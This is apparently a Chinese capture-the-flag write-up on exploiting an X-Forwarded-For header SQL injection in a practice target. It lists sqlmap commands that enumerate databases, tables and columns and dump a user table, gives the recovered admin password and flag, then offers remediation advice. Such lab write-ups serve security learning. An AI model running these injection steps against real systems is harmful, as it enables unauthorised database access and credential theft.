X-Forwarded-For注入漏洞

0x 00 环境介绍

靶机http://219.153.49.228:48033,通过注入完成找到网站的key。


1 |0 0x01复现过程

1.访问网站使用admin/admin登入,用burpsuite截包寻找注入点

>>截到的包,正常放包回显内容

>>加X-forwarded-for:1.1.1.1回显IP数据改变,可能存在注入点

2.保存post包进行sql注入

保存post包1.txt,加上X-forwarded-for:*作为注入点,在windows上使用sqlmap跑

暴库:python sqlmap.py -r 1.txt --dbs --batch

开始试了很多次,payload也换了几个了没成功,后来发现请求头和请求体没有分开。

>>修改后

a.暴数据库

python sqlmap.py -r 1.txt --dbs

b.暴数据表

python sqlmap.py -r 1.txt -D webcalendar --tables

c.暴列表

python sqlmap.py -r 1.txt -D webcalendar -T user --columns

d.暴字段

python sqlmap.py -r 1.txt -D webcalendar -T user "password" --dumps

3.使用admin/116012900登入拿到key:mozhebb8300a328e13dd2abd55c5d8dd


1 |1 0x02修复建议

(1)程序代码里的所有查询语句,使用标准化的数据库查询语句API接口,设定语句的参数进行过滤一些非法的字符,防止用户输入恶意的字符传入到数据库中执行sql语句。

(2)对用户提交的的参数安全过滤,像一些特殊的字符(,()*&......%#等等)进行字符转义操作,以及编码的安全转换。

(3)网站的代码层编码尽量统一,建议使用utf8编码,如果代码里的编码都不一样,会导致一些过滤被直接绕过。

(4)网站的数据类型,必须确定,是数字型,就是数字型,字符型就是字符型,数据库里的存储字段类型也设置为ini型。

(5)对用户的操作权限进行安全限制,普通用户只给普通权限,管理员后台的操作权限要放开,尽量减少对数据库的恶意攻击。

(6)网站的报错信息尽量不要返回给客户端,比如一些字符错误,数据库的报错信息,尽可能的防止泄露给客户端。


1 |2 0x03总结思考

首先通过回显页面异常找到对应的注入点,将post文件保存,然后使用sqlmap跑post包,另外请求体和请求头一定要分开。

相关推荐
TechWayfarer18 分钟前
攻防对抗:利用IP段归属查询工具快速封禁攻击源——3步联动防火墙(附脚本)
python·网络协议·tcp/ip·安全
常宇杏起2 小时前
AI安全进阶:AI模型鲁棒性测试的核心方法
大数据·人工智能·安全
木泽八2 小时前
2026年网络安全威胁全景:AI攻防新纪元完全指南
人工智能·安全·web安全
不吃香菜5672 小时前
cloudcode入门学习
java·windows·cloudcode
星幻元宇VR2 小时前
VR互动平台|开启沉浸式体验新方式
科技·学习·安全·vr·虚拟现实
云空3 小时前
《Hermes Agent 部署与使用中的安全漏洞分析及解决办法》
网络·人工智能·安全
liu****4 小时前
LangGraph-AI应用开发框架(二)
windows·langchain·大模型·工作流·langgraph
常宇杏起4 小时前
AI安全进阶:AI模型投毒攻击的检测与防御
大数据·人工智能·安全
哇哦9824 小时前
渗透安全(渗透防御)②
linux·安全·渗透防御
老张的张Z4 小时前
CISSP 域6知识点 安全测试方法
安全·信息安全·cissp